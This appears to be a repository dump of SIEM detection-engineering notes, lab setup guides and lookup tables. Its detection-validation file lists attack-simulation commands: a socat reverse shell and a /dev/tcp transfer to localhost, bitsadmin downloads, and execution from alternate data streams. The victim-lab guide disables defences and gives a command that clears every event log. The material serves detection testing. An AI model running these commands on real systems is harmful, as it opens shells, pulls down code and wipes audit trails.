├── .gitignore ├── Detect.ods ├── Detection-Library-Structure.md ├── Detection-Methods.md ├── Detection-Tactics.md ├── Documentation-Templates ├── After-Action-Review.md ├── Incident-Response-Plan.md ├── Incident-Response-Policy.md └── System-and-Information-Integrity-Policy.md ├── LICENSE ├── Lab ├── WindowsVictim.md ├── detection_validation.md ├── helk.md ├── pfSense.md └── sysmonlabconfig.xml ├── Logging.md ├── Lookups ├── o365-principalappid.csv ├── windows-logon-type.csv └── windows-status-code.csv ├── Metrics.md ├── Notable-Event-IDs.md ├── Orientation └── crown-jewels.md ├── README.md ├── Signatures └── Splunk │ ├── panorama-config-change-spike.md │ ├── panorama-config-change-unknown-user.md │ ├── panorama-failed-logon-spike.md │ ├── panorama-large-transfer.md │ ├── panorama-src_ip-dest_port-spike.md │ ├── panorama-src_ip-distinct-dest_ip-spike.md │ ├── panorama-src_ip-unknown-dest_ip-spike.md │ ├── panorama-suspicious-dest_port.md │ ├── panorama-threat-detected.md │ ├── panorama-unkown-app-protocol.md │ ├── sourcetype-outage-dynamic.md │ └── splunk-general.md ├── Splunk └── apps │ └── Splunk_TA_paloalto │ └── local │ └── props.conf ├── Tactics ├── API-Usage.md ├── Account-Creation.md ├── Account-Logon.md ├── Account-Modification.md ├── Application-Log.md ├── Commandline-Activity.md ├── Configuration-Change.md ├── DNS-Request.md ├── Email-Traffic.md ├── File-Access.md ├── File-Content.md ├── File-Creation.md ├── File-Deletion.md ├── File-Modification.md ├── File-Rename.md ├── Group-Access.md ├── Group-Creation.md ├── Group-Deletion.md ├── Group-Modifcation.md ├── Group-Rename.md ├── Instance-Creation.md ├── Instance-Deletion.md ├── Instance-Modification.md ├── Instance-Start.md ├── Instance-Stop.md ├── Log-Clearing.md ├── Module-Load.md ├── NGAV-Alarms.md ├── Network-Activity-by-Flow.md ├── Network-Activity-by-IP.md ├── Network-Activity-by-Process.md ├── Network-Full-Packet-Capture.md ├── Process-Access.md ├── Process-Execution.md ├── Registry-Creation.md ├── Registry-Modification.md ├── Resource-Consumption.md ├── Scheduled-Task-Creation.md ├── Service-Creation.md ├── Service-Modification.md ├── Web-Request.md └── Web-Server.md ├── Threat-Hunting.md ├── Use-Case-Structure.md ├── Use-Cases.md ├── UseCases ├── Detect-Password-Spraying-via-Windows-Events.md ├── Layer3-Firewall.md └── Layer7-Firewall.md ├── attack-tools-resources.md ├── dashboards.md ├── field-kit.md ├── hardening ├── dns-security.md ├── email-security.md ├── general-security.md ├── microsoft-365-auditing-and-reporting.md ├── microsoft-365-azure-ad.md ├── microsoft-365-exchange.md ├── microsoft-365-sharepoint-and-onedrive.md ├── microsoft-365-teams.md ├── microsoft-active-directory.md ├── microsoft-windows-dns.md ├── microsoft-windows.md ├── network.md ├── remote-access.md ├── software-manufacturers.md └── web-security.md ├── incident-tracking.md ├── interview-questions.md ├── mitigation-categories.md ├── osintel.md ├── response-tools-resources.md ├── sigma ├── Copy-SplunkSigma-Sysmon1-to-4688.ps1 ├── adoption.md ├── filters │ ├── test_filter1.yml │ └── test_filter2.yml ├── output │ └── savedsearches.conf ├── pipelines │ ├── cloudtrail.yml │ ├── linux_builtin.yml │ ├── webserver_generic.yml │ ├── windows.yml │ ├── windows_sysmon.yml │ └── windows_xml.yml └── sigma-splunk-library.md └── technical-documentation.md /.gitignore: -------------------------------------------------------------------------------- 1 | *.tmp 2 | .~lock.Detect.ods# 3 | .vscode/settings.json 4 | .vscode/launch.json 5 | -------------------------------------------------------------------------------- /Detect.ods: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TonyPhipps/SIEM/dacbe207f7788822f14c78ca380d20690eed7f0c/Detect.ods -------------------------------------------------------------------------------- /Detection-Library-Structure.md: -------------------------------------------------------------------------------- 1 | - [Executive Summary](#executive-summary) 2 | - [Name](#name) 3 | - [Problem Statement](#problem-statement) 4 | - [Objectives](#objectives) 5 | - [Compliance](#compliance) 6 | - [MITRE ATT&CK Framework](#mitre-attck-framework) 7 | - [Assumptions and Limitations](#assumptions-and-limitations) 8 | - [Analysis](#analysis) 9 | - [Monitoring and Notifications](#monitoring-and-notifications) 10 | - [Recommended Response Action(s)](#recommended-response-actions) 11 | - [Engineering](#engineering) 12 | - [Component Names](#component-names) 13 | - [Alert [Name]](#alert-name) 14 | - [Query [Name]](#query-name) 15 | - [Data Stream Analysis](#data-stream-analysis) 16 | - [Validation](#validation) 17 | - [Attack Simulation](#attack-simulation) 18 | - [References and Resources](#references-and-resources) 19 | 20 | 21 | # Executive Summary 22 | 23 | Primarily focused on providing high-level information, references, and background. 24 | 25 | 26 | ## Name 27 | 28 | A succinct statement that describes the detection (e.g. Detect Communication with a Known-Bad IP). 29 | 30 | 31 | ## Compliance 32 | 33 | List applicable compliance frameworks and specific components this Detection relates to. 34 | 35 | 36 | ## MITRE ATT&CK Framework 37 | 38 | List applicable MITRE ATT&CK Framework Tactics/Techniques this Detection relates to. 39 | 40 | ## Assumptions and Limitations 41 | 42 | Describes any assumptions/limitations regarding law, licensing, policies, or technicalities. 43 | 44 | 45 | # Analysis 46 | 47 | Insight on the actions of and tools for those who are expected to monitor and respond. 48 | 49 | 50 | ## Monitoring and Notifications 51 | 52 | Describes how the detection will bring attention to itself. This typically involves monitors, dashboards, reports, emails, alerts, etc. 53 | 54 | 55 | ## Recommended Use Case / Playbook(s) 56 | 57 | Describes which one or more playbooks should be followed in handling the detection. 58 | 59 | 60 | # Engineering 61 | 62 | The necessary steps and content construction that fulfills the Detection. If the Detection and all its components were lost, this section should allow complete reconstruction. 63 | 64 | 65 | ## Component Names 66 | 67 | The base components that provide business logic, display, and notification. 68 | - Include the expected source log makeup and example. 69 | - Use a word like "Suspicious" to indicate that the fidelity is lower, therefore some false positives may result. 70 | - Group alerts/queries into a single use case when they share common objectives/recommended response actions. 71 | 72 | 73 | ### Alert [Name] 74 | 75 | - Filter 76 | - Grouping 77 | - Severity 78 | - Threshold 79 | - Event Count 80 | - Time Window 81 | - Category/Normalization 82 | - Tags 83 | - Fidelity (high means no false positives) 84 | 85 | 86 | ### Query [Name] 87 | 88 | - Query String 89 | - Fidelity (high means no false positives) 90 | - Query Explanation 91 | 92 | 93 | ## Validation 94 | 95 | Methods to ensure the Detection was developed and is operating properly. These can be pass/fail, time based, or other relevant measurements. When possible, include an automated script or manual steps to cause the alert to fire on demand (i.e. attack simulation). 96 | 97 | 98 | ### Attack Simulation 99 | 100 | Specific actions to reproduce events that are expected to be detected/highlighted by use case components. 101 | 102 | 103 | ## References and Resources 104 | Any useful resources or references that can help understand the vulnerability, attack, detection logic, affected software, protocols, etc. 105 | -------------------------------------------------------------------------------- /Detection-Methods.md: -------------------------------------------------------------------------------- 1 | # Alarms 2 | 3 | ## Match Alarm 4 | - An Alarm is generated for each match. 5 | 6 | ## Threshold Alarm 7 | - Build a watchlist with one or more fields 8 | - For each matching event, add a record to the watchlist 9 | - For each record changed, count the total number of matching records 10 | - Alarms when Threshold exceeds a specified value 11 | - Watchlist records are removed based on time since creation 12 | 13 | ## Blacklist Alarm 14 | - Manually add records to a watchlist of one or more fields 15 | - For each matching event, compare to existing records 16 | - Alarm if matching event matches all the fields of any record 17 | 18 | ## Whitelist Alarm 19 | - Manually add records to a watchlist of one or more fields 20 | - For each matching event, compare to existing records 21 | - Alarm if matching event does NOT match all the fields of any record 22 | 23 | ## Rolling Whitelist Alarm 24 | 25 | (AKA sliding window) 26 | 27 | - Build a watchlist with one or more fields, including a counter field 28 | - For each matching event, add a record to the watchlist or increment the counter of the matching record 29 | - Alarm when a new entry is observed (counter value == 1) 30 | - Alarm when a counter exceeds a specified threshold 31 | - Watchlist entries are removed based on age of last edited time 32 | 33 | ## Deviation from Baseline Alarm 34 | - Build watchlist with one or more fields, including a numeric 'baseline' field 35 | - For each matching event, add a record to the watchlist and calculate the average of all records' baseline value 36 | - Matching events have their selected numeric field compared with the average baseline value 37 | - Alarm if percentage of difference between matched event and baseline average exceeds a set value or percentage 38 | - Watchlist records are removed based on time since creation 39 | 40 | ## Time of Day Alarm 41 | - Build a watchlist of one or more fields, including start time of day and end time of day 42 | - For each matching event, determine if time of event falls between matching records' start time of day and end time of day 43 | - Alarm if event time is not within start and stop times 44 | 45 | ## Day of Week Alarm 46 | - Build a watchlist of one or more fields, including one for each day of week 47 | - For each matching event, determine if matching record's matching day of week field is FALSE 48 | - Alarm if matching record's day of week field is FALSE 49 | 50 | ## Group of Alarms 51 | - For matching alarm event, store in a watchlist 52 | - For next matching alarm event, compare to watchlist for matches in one or more properties. 53 | - Alarm if match is found 54 | 55 | ## Levenshtein Score Alarm 56 | 57 | (AKA Edit Distance; AKA Similarity Score) 58 | 59 | https://en.wikipedia.org/wiki/Levenshtein_distance 60 | 61 | A score of 0 means both strings are equal. 62 | 63 | - Build a watchlist of words to match against 64 | - For each matching event, calculate levenshtein score of selected field value against each entry in watchlist 65 | - Alarm if any score falls below a given threshold 66 | 67 | ## Shannon Entropy Score Alarm 68 | 69 | (AKA Frequency Score; AKA randomness score) 70 | 71 | https://en.wikipedia.org/wiki/Entropy_(information_theory) 72 | 73 | A higher score means the string has a higher level of randomness. 74 | 75 | - For each matching event, calculate Shannon Entropy Score of selected field value 76 | - Alarm if any score falls below a given threshold 77 | 78 | - Calculating the randomness of strings and Alarming when the score exceeds a given threshold. 79 | 80 | 81 | ## Alarm Controls 82 | 83 | ### Mute 84 | - Silence identical alarms for X time period 85 | 86 | ### Aggregation 87 | - Group identical alarms when X or more fire in Y time period 88 | 89 | # Visualizations 90 | 91 | ## Aggregate Count 92 | 93 | (AKA Stack Count; AKA Long Tail Analysis) 94 | Also known as stacking or least frequency of occurrence analysis (LFO), this method involves counting the number of occurrences of each unique value and sorting them in ascending order. The values with the lowest counts are considered outliers. In some cases, this can be reversed, with the values with the highest counts being considered the outliers, but this is relatively rare. 95 | 96 | Z-score 97 | When dealing with numeric values, a statistical test like z-score can be used. This test looks for values that are ± a certain threshold from the standard deviation. Typically, this threshold is two or three standard deviations. -------------------------------------------------------------------------------- /Documentation-Templates/After-Action-Review.md: -------------------------------------------------------------------------------- 1 | ## After Action Review and Reporting 2 | After-Action Reports (AARs) are created during and after After-Action Review meetings to identify successes, failures, and lessons learned. These reports also serve to track the assignment and execution of any changes that may be warranted as a result of lessons learned. 3 | 4 | AARs shall include: 5 | - Unique Ticket ID Number 6 | - Incident Summary 7 | - All fields from the ticket 8 | - Activities to Sustain 9 | - Opportunities to Improve 10 | - Action Items and the individual assigned to each 11 | 12 | Action items shall be tracked until completion. Completed AARs shall be stored in the ticket as an attachment. 13 | 14 | 15 | ### AAR Fundamentals 16 | - Conducted during or immediately after each event 17 | - Focused on intent, objectives and standards 18 | - Focus is on team member, manager, and company performance 19 | - Involves all participants in the discussion 20 | - Uses open-ended questions 21 | - Encourages initiative and innovation in finding more effective ways to achieve standards and meet objectives and intent 22 | - Determines strengths and weaknesses 23 | - Links performance to subsequent training 24 | 25 | 26 | ### AAR Agenda 27 | 28 | 29 | #### Introduction 30 | - **Everyone must participate** if they have an insight, observation, or question which will help the team identify and correct deficiencies or sustain strengths. The AAR is a dynamic, candid, professional discussion of training that focuses on team performance measured against the task standards. 31 | - **The AAR is not a critique.** No one, regardless of rank, position, or strength of personality, has all of the information or answers. AARs maximize training benefits by allowing members to learn from each other. 32 | - **The AAR does not evaluate success or failure.** There are always weaknesses to improve and strengths to sustain. 33 | - Reinforce the fact that it is permissible to disagree respectfully. 34 | - Focus on learning and encourage people to give honest opinions. 35 | - Use open-ended and leading questions to guide the discussion of member, manager, and team performance. 36 | - Enter the discussion only when necessary. 37 | 38 | 39 | #### Review What was Supposed to Happen 40 | The facilitator, along with the participants, reviews what was supposed to happen. This review is based on the intent, objectives and standards. This information is usually found in the IR Policy, Plan and related documentation. 41 | 42 | - State the objectives and standards 43 | - Review Opposition Forces (OPFOR) if used, including their mission and purpose 44 | - Review company mission, intent and concept of operations 45 | 46 | 47 | #### Review What Did Happened 48 | The facilitator and participants determine what actually occurred during the incident. The leader attempts to gather as many views or perspectives (OPFOR, manager, analyst, engineer, etc) as feasible and possible. This helps to establish a common understanding of the operation/event. Leaders then understand the complexity of an event and work to solve complex, ill-defined problems quickly. 49 | 50 | - Review actions before first detection 51 | - Review report of first detection or contact 52 | - Review reaction to detection or contact 53 | - Review events during engagement 54 | 55 | 56 | #### Review What Went Right and Wrong 57 | Participants are to establish the strong and weak points of their performance based on the original intent and performance measures. The facilitator guides discussions to ensure maximum input that is operationally sound and relevant to the incident. 58 | 59 | - Review extent to which objectives were met 60 | - Review extent that the intent was met 61 | - Have participants summarize the major learning points 62 | - Identify training deficiencies 63 | - Identify team's ability to perform task and meet intent 64 | - Identify safety risks and measures employed to mitigate the risks 65 | 66 | 67 | ### Determine how the event or task should be done next time 68 | The facilitator guides the unit in self-determining how the task(s) might be performed more effectively in the future. The unit identifies problems and provides solutions as well as identifies who is responsible for making the recommended changes. Additionally, the facilitator guides the discussion to determine if there is a more effective way to train the tasks to achieve the commander's intent. 69 | 70 | - Identify if retraining should occur 71 | - Identify the condition(s) to modify 72 | - Identify which task(s) to retrain to meet the intent 73 | - Identify a more effective way to meet the intent 74 | 75 | 76 | ## AAR Resources 77 | - https://www.nwcg.gov/sites/default/files/wfldp/docs/army-leaders-guide-to-aar.pdf -------------------------------------------------------------------------------- /Lab/WindowsVictim.md: -------------------------------------------------------------------------------- 1 | In order to build a lab for Windows logs, a Windows system is required. The content on this page will focus on setting up a victim system with advanced logging. While production systems may not have such high levels of logging, it remains important to understand how attacks and activities can be logged. It may be the case that observations in a lab environment warrant increasing logging on production systems to allow detection. 2 | 3 | - [Windows Configuration](#windows-configuration) 4 | - [Disable Windows Firewall](#disable-windows-firewall) 5 | - [Disable Password Protected Sharing](#disable-password-protected-sharing) 6 | - [PowerShell Logging](#powershell-logging) 7 | - [Increase Log Size](#increase-log-size) 8 | - [Enable Process Creation (Event ID 4688)](#enable-process-creation-event-id-4688) 9 | - [Enable Task History](#enable-task-history) 10 | - [Sysmon](#sysmon) 11 | - [WinLogBeat](#winlogbeat) 12 | - [Other Useful Tidbits](#other-useful-tidbits) 13 | - [Clear all the Logs](#clear-all-the-logs) 14 | 15 | # Windows Configuration 16 | 17 | ## Disable Windows Firewall 18 | Windows Security > Firewall & Network Protection > Private Network > Turn Off 19 | 20 | ## Disable Password Protected Sharing 21 | 22 | - Control Panel > Network and Internet > Network and Sharing Center > Advanced Sharing Settings > All Networks > ... 23 | - Public Folder Sharing > Turn on... 24 | - Password Protected Sharing > Turn off... 25 | 26 | ## PowerShell Logging 27 | - %SystemRoot%\system32\winevt\logs\Microsoft-Windows-PowerShell%4Operational.evtx 28 | 29 | ### Enable ScriptBlock Logging 30 | (Event ID 4104) 31 | - Create they key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 32 | - Create new DWORD 33 | - EnableScriptBlockLogging = 1 34 | - EnableScriptBlockInvocationLogging = 1 35 | - Event ID 4104 will populate the Microsoft-Windows-PowerShell/Operational log 36 | 37 | -OR- 38 | 39 | - gpedit.msc 40 | - Computer Configuration > Administrative Templates > Windows Components > Windows Powershell 41 | - Turn On Script Block Logging: Enabled 42 | - Log Stop/Start Events: Checked 43 | 44 | ### Enable Module Logging 45 | - Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging 46 | - Create new DWORD EnableModuleLogging = 1 47 | - Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames 48 | - Create new STRING VALUE \* = * (an asterisk for the value and data) 49 | 50 | -OR- 51 | 52 | - gpedit.msc 53 | - Computer Configuration > Administrative Templates > Windows Components > Windows Powershell 54 | - Turn On Module Logging: Enabled 55 | - Module Name: * 56 | 57 | Event ID 4103 will populate the Microsoft-Windows-PowerShell/Operational log 58 | 59 | ### Transcription 60 | - Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription\ 61 | - Create new DWORD EnableInvocationHeader = 1 62 | - Create new DWORD EnableTranscripting = 1 63 | - Create new STRING VALUE OutputDirectory = 64 | - Logs will be stored in .txt files in teh specified directory, using the format `..\YYYYMMDD\PowerShell_transcript.PCNAME.RANDOM.YYYYMMDDHHMMSS.txt` 65 | 66 | -OR- 67 | 68 | - gpedit.msc 69 | - Computer Configuration > Administrative Templates > Windows Components > Windows Powershell 70 | - Turn On PowerShell Transcription: Enabled 71 | - Log Stop/Start Events: Checked 72 | 73 | ## Increase Log Size 74 | - Event Viewer > Application and Service Logs > Microsoft > Windows > PowerShell > Operational 75 | - Event Viewer > Application and Service Logs > Microsoft > Windows > Sysmon > Operational 76 | - Right Click > Properties 77 | - Maximum Log Size ( KB ): 100,032 or higher is recommended 78 | 79 | ## Enable Process Creation (Event ID 4688) 80 | - Secpol.exe 81 | - Advanced Audit Policy Configuration > System Audit Policies > Detailed Traking 82 | - Audit Process Creation: Enabled, Success 83 | 84 | ### Include Command Line in 4688 Events 85 | - gpedit.msc 86 | - Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options 87 | - Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings: Enabled 88 | - Computer Configuration > Administrative Templates > System > Audit Process Creation 89 | - Include command line in process creation events: Enabled 90 | 91 | ## Enable Task History 92 | - Task Scheduler 93 | - Click Enable All Tasks History 94 | 95 | # Sysmon 96 | - Copy Sysmon to virtual host and install as a service 97 | - c:\windows\sysmon\sysmon64.exe -accepteula -i [sysmonlabconfig.xml](/Lab/sysmonlabconfig.xml) 98 | - %SystemRoot%\system32\winevt\logs\Microsoft-Windows-Sysmon%4Operational.evtx 99 | 100 | # WinLogBeat 101 | - https://www.elastic.co/downloads/beats/winlogbeat 102 | - Configure WinLogBeat by editing winlogbeat.yml 103 | - Recommended starter config: https://raw.githubusercontent.com/Cyb3rWard0g/HELK/master/winlogbeat/winlogbeat.yml 104 | - Ensure the ```hosts:``` section of the config file has the correct destination IP 105 | - Install via install-service-winlogbeat.ps1, then start via ```Start-Service winlogbeat``` 106 | 107 | 108 | ### Break SleepStudy 109 | Sometimes this odd service will begin creating an endless loop of .etl files. This command breaks that "feature," since there is no proper option to disable it. 110 | ``` 111 | Set-ItemProperty -Path C:\Windows\System32\SleepStudy\*.etl -Name IsReadOnly -Value $true 112 | ``` 113 | 114 | # Other Useful Tidbits 115 | 116 | ## Clear all the Logs 117 | `wevtutil el | Foreach-Object {wevtutil cl "$_"}` 118 | -------------------------------------------------------------------------------- /Lab/detection_validation.md: -------------------------------------------------------------------------------- 1 | # AppInstaller.exe T1105 2 | start ms-appinstaller://?source=https://127.0.0.1/bad.txt 3 | 4 | # Aspnet_Compiler.exe T1127 5 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\asptest\ -f C:\asptest\none -u 6 | 7 | # at.exe T1053.002 8 | C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\calc.exe 9 | 10 | # Atbroker.exe T1218 11 | C:\Windows\System32\Atbroker.exe /start calc.exe 12 | C:\Windows\SysWOW64\Atbroker.exe /start calc.exe 13 | 14 | # Bash.exe T1202 15 | C:\Windows\System32\bash.exe -c calc.exe 16 | C:\Windows\System32\bash.exe -c "socat tcp-connect:127.0.0.1:80 exec:sh,pty,stderr,setsid,sigint,sane" 17 | C:\Windows\System32\bash.exe -c 'cat calc.exe > /dev/tcp/127.0.0.1/24' 18 | 19 | # Bitsadmin.exe T1564.004 20 | C:\Windows\System32\bitsadmin.exe /create myfile 21 | C:\Windows\System32\bitsadmin.exe /addfile myfile c:\windows\system32\notepad.exe c:\notepad.exe 22 | C:\Windows\System32\bitsadmin.exe /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL 23 | C:\Windows\System32\bitsadmin.exe /RESUME myfile 24 | 25 | 26 | # Bitsadmin.exe T1105 27 | C:\Windows\System32\bitsadmin.exe /create 1 28 | C:\Windows\System32\bitsadmin.exe /addfile 1 https://live.sysinternals.com/autoruns.exe c:\autoruns.exe 29 | C:\Windows\System32\bitsadmin.exe /RESUME 1 30 | C:\Windows\System32\bitsadmin.exe /complete 1 31 | 32 | # Bitsadmin.exe T1105 33 | C:\Windows\System32\bitsadmin.exe /create 1 34 | C:\Windows\System32\bitsadmin.exe /addfile 1 c:\windows\system32\cmd.exe c:\cmd.exe 35 | C:\Windows\System32\bitsadmin.exe /RESUME 1 36 | C:\Windows\System32\bitsadmin.exe /Complete 1 37 | C:\Windows\System32\bitsadmin.exe /reset 38 | 39 | # Bitsadmin.exe T1218 40 | C:\Windows\System32\bitsadmin.exe /create 1 41 | C:\Windows\System32\bitsadmin.exe /addfile 1 c:\windows\system32\cmd.exe c:\cmd.exe 42 | C:\Windows\System32\bitsadmin.exe /SetNotifyCmdLine 1 c:\cmd.exe NULL 43 | C:\Windows\System32\bitsadmin.exe /RESUME 1 44 | C:\Windows\System32\bitsadmin.exe /Reset 45 | 46 | 47 | 48 | 49 | # Resources 50 | https://lolbas-project.github.io/# -------------------------------------------------------------------------------- /Lab/helk.md: -------------------------------------------------------------------------------- 1 | # Quick Setup Guide for HELK 2 | 3 | https://github.com/Cyb3rWard0g/HELK 4 | 5 | - Create an Ubuntu-based VM 6 | - ```sudo apt install git``` 7 | - ```git clone https://github.com/Cyb3rWard0g/HELK``` 8 | - ```cd HELK/docker/``` 9 | - ```sudo ./helk_install.sh``` 10 | - Optionally tail the install log in a second terminal via ```tail -f /var/log/helk-install.log``` 11 | - Select Build number 1 -------------------------------------------------------------------------------- /Lab/pfSense.md: -------------------------------------------------------------------------------- 1 | Running malware in a lab environment demands some sort of firewall protection, which pfSense provides well and cheaply. 2 | 3 | # Virtualization Recommended Settings 4 | - 1GB Memory 5 | - 1 Virtual processor 6 | - 4GB Hard drive 7 | - Provide two network interfaces - one joined to a Private Network, one joined to the External Network (if you wish to connect to the real world) 8 | 9 | 10 | # Installation 11 | - Literally accepting every default is fine and fast. 12 | 13 | 14 | # Initial Setup 15 | - Assign WAN to the interface tied to External Network (use the MAC to verify, or unplug the interface) 16 | - Assign LAN to the internface tied to Private Network (use the MAC to verify, or unplug the interface) 17 | - You may need to assign a static IP to the LAN interface (option 2), like 192.168.2.1 18 | - When asked if you want to enable DHCP, say Yes 19 | - When asked if you want to revert to HTTP as the webConfigurator protocol, say No. 20 | - Now you can use the virtual hosts on the internal network to access the web interface via the LAN IP. 21 | - Default username: admin 22 | - Default password: pfsense 23 | - Using the web interface, navigate to Services > DHCP Server and provide DNS servers 24 | - 1.1.1.1 25 | - 9.9.9.9 26 | - 8.8.8.8 27 | - Navigate to Advanced > Admin Access 28 | - Ensure Protocol is set to HTTPS 29 | - Ensure SSH is enabled 30 | 31 | # Suricata Setup 32 | - Install the Suricata package at System > Package Manager 33 | - Services > Suricata 34 | - Global Settings 35 | - Enable "Install ETOpen Emerging Threats rules" 36 | - Enable "Install Snort GPLv2 Community rules" 37 | - Set update interval to 1 day 38 | - Enable "Live Rule Swap on Update" 39 | - Updates 40 | - Click Update to perform an update -------------------------------------------------------------------------------- /Logging.md: -------------------------------------------------------------------------------- 1 | # Log Priority 2 | 3 | The following is a prioritized list of recommended event logs to collect into your SIEM (ordering should be customized per organization and is subject to change here). 4 | 5 | - Security Product Logs (EDR/AV/HIPS/IPS) 6 | - Windows DC Event Logs / LDAP Logs 7 | - Web Proxy Requests 8 | - PowerShell Logs 9 | - DNS Queries (with endpoint name/IP) 10 | - Firewall (Egress Only) 11 | - VPN Logs 12 | - Google Cloud Logging 13 | - AWS CloudWatch 14 | - Microsoft M365 UnifiedAuditLog 15 | - Microsoft AzureAD Sign-In Logs 16 | - Microsoft Cloud App Security Logs 17 | - Microsoft AzureAD Identity Protection 18 | - Microsoft M365 Defender for Identity 19 | - Linux osquery Logs 20 | - Windows Member Server Event Logs 21 | - Windows Workstation Event Logs 22 | - Linux auditd Logs 23 | - Email Logs 24 | - Custom Application Logs 25 | - Firewall 26 | - DHCP 27 | - Netflow 28 | - AWS VPC Flow Logs 29 | - Google VPC Flow Logs 30 | - Microsoft Network Security Group Flow Logs 31 | - Full packet capture 32 | 33 | 34 | The priority here takes into consideration 35 | - Data ingestion/space restrictions 36 | - Common attack vectors 37 | - Common detection sources 38 | - Expected noise levels 39 | - Overaid aid to investigations 40 | - Legal precedence on what adequate security monitoring includes 41 | 42 | 43 | # Requirements 44 | - Normalize all field names and content. This is critical to success in correlation and analyst faith in their search results. 45 | - Parse-out nested fields. Looking at you, Microsoft Event Log "Message" field. 46 | - All event logs should be set to ISO 8601 UTC. This may require transforms to convert from the original device's local time. 47 | - All devices should sync with Network Time Protocol (NTP) providers. 48 | 49 | 50 | # Considerations 51 | - What in the system performance impact of log collection on an endpoint? 52 | - What in the system performance impact of log collection on network appliances? 53 | - How long should data be held in "hot" (searchable) storage? 54 | - How long is data to be held in "cold" (backup) storage? 55 | - How much storage space is needed? 56 | - Is there an enforceable logging policy in place? 57 | - What is the expected event load on the server, and what is the appropriate amount of hardware resources to handle the load? 58 | - How will event log feeds be monitored for issues/outage? 59 | - What is the maximum allowable travel time from when an event occurs to when the log reaches the centralized logging server? 60 | 61 | 62 | # Event Reduction 63 | 64 | Reduction of ingested events to only those with a security concern is highly recommended. This may require a separate 'data lake' from logs maintained for regulatory compliance. Reduced logs saves money, analyst time, and improves system performance. 65 | 66 | Common tune-outs at the ingest level include 67 | - Authorized vulnerability scanners 68 | - Debug logs 69 | - Encrypted data 70 | - File access by backup service accounts 71 | - Common application errors 72 | - Health Checks 73 | 74 | Some logs can be significantly reduced by eliminating one or more fields, like Windows Event Logs often multi-paragraph long descriptions included in the log. 75 | 76 | Logs that do not provide basic security context should be considered for tuning out: 77 | - Date and Time of Action 78 | - Source System/Account Attribution 79 | - Description of Action 80 | - Description of Target (when applicable) 81 | - Description of Outcome (sometimes implied) 82 | 83 | Note: This does not immply that non-security focused logs are of no value/use. 84 | 85 | ## Detection Layering 86 | This approach allows a high-level understanding of interactions between log collection, detections, and monitoring. 87 | 88 | - Detection can (and should) occur at any tier. 89 | - "Tuning" based on content analysis and feedback should be used on every tier. 90 | 91 | Tiers 92 | - Raw Events 93 | - Monitoring for visible anomalies in a stream of events. 94 | - Are the logs needed? 95 | - Can we filter some events? 96 | - Are the appropriate fields collected? 97 | - Are the fields parsed correctly? 98 | 99 | - Aggregation of Raw Events (usually via widgets on dashboards) 100 | - Stack counting of one or more fields helps surface interesting events 101 | - Which fields do you aggregate? 102 | - When should information roll over/expire? 103 | - Styles 104 | - Aggregation counts 105 | - First occurance 106 | - Last occurance 107 | - Frequency bar chart enabling Long tail analysis 108 | 109 | - Prioritized Alerts 110 | - When confirmed incidents are found, an opportunity to create a prioritized alert is presented. 111 | - What is the criticality of asset? 112 | - People 113 | - Services 114 | - Devices 115 | - Data 116 | - Tiers within assets 117 | - Interaction between assets 118 | - What is the fidelity of the technique? 119 | - Blacklist Alert 120 | - Whitelist 121 | - Count Threshold 122 | - Newly Observed 123 | - Etc. 124 | 125 | - Incidents 126 | - A Prioritized Alert of highest severity requires acknowledgement. 127 | - Known-Bad 128 | - Vendor Signature 129 | - IP 130 | - Domain 131 | - Etc. 132 | 133 | 134 | 135 | # Log Setup 136 | 137 | ## PowerShell Transcription 138 | https://devblogs.microsoft.com/powershell/powershell-the-blue-team/ 139 | 140 | - Set up PowerShell Transcription logging via GPO at 141 | - Windows Components -> Administrative Templates -> Windows PowerShell 142 | - Turn On PowerShell Transcription: ON 143 | - Set Transcript output directory to the \\server\transcripts share path 144 | - Check Include Invocation Headers 145 | 146 | ## Windows Event Forwarding and Collector 147 | https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection 148 | https://docs.microsoft.com/en-us/windows/win32/wec/windows-event-collector 149 | https://medium.com/palantir/windows-event-forwarding-for-network-defense-cb208d5ff86f 150 | https://hackernoon.com/the-windows-event-forwarding-survival-guide-2010db7a68c4 151 | http://zenshaze.com/wp/?p=57 152 | 153 | - Set WEC timezone to UTC / GMT 154 | - Set up GPO Computer Configuration → Policies → Administrative Templates → Windows Components → Event Forwarding → Configure Target Subscription Manager 155 | - Set up subscriptions 156 | -------------------------------------------------------------------------------- /Lookups/windows-logon-type.csv: -------------------------------------------------------------------------------- 1 | "Logon Type","Description" 2 | "2","Interactive" 3 | "3","Network" 4 | "4","Batch" 5 | "5","Service" 6 | "7","Unlock" 7 | "8","NetworkCleartext" 8 | "9","NewCredentials" 9 | "10","RemoteInteractive" 10 | "11","CachedInteractive" -------------------------------------------------------------------------------- /Lookups/windows-status-code.csv: -------------------------------------------------------------------------------- 1 | "Status Code","Description" 2 | "0xC0000064","user name does not exist" 3 | "0xC000006A","user name is correct but the password is wrong" 4 | "0xC0000234","user is currently locked out" 5 | "0xC0000072","account is currently disabled" 6 | "0xC000006F","user tried to logon outside his day of week or time of day restrictions" 7 | "0xC0000070","workstation restriction, or Authentication Policy Silo violation (look for event ID 4820 on domain controller)" 8 | "0xC0000193","account expiration" 9 | "0xC0000071","expired password" 10 | "0xC0000133","clocks between DC and other computer too far out of sync" 11 | "0xC0000224","user is required to change password at next logon" 12 | "0xC0000225","evidently a bug in Windows and not a risk" 13 | "0xc000015b","The user has not been granted the requested logon type (aka logon right) at this machine" -------------------------------------------------------------------------------- /Metrics.md: -------------------------------------------------------------------------------- 1 | Metrics require fields, queries, and manual work. This section also suggests which ticketing system and form fields are recommended to allow proper recording/reporting of metrics. 2 | 3 | # Recommended Fields for Metric Collection 4 | - DateTime Occurred 5 | - DateTime Detected 6 | - DateTime Contained 7 | - DateTime Expelled 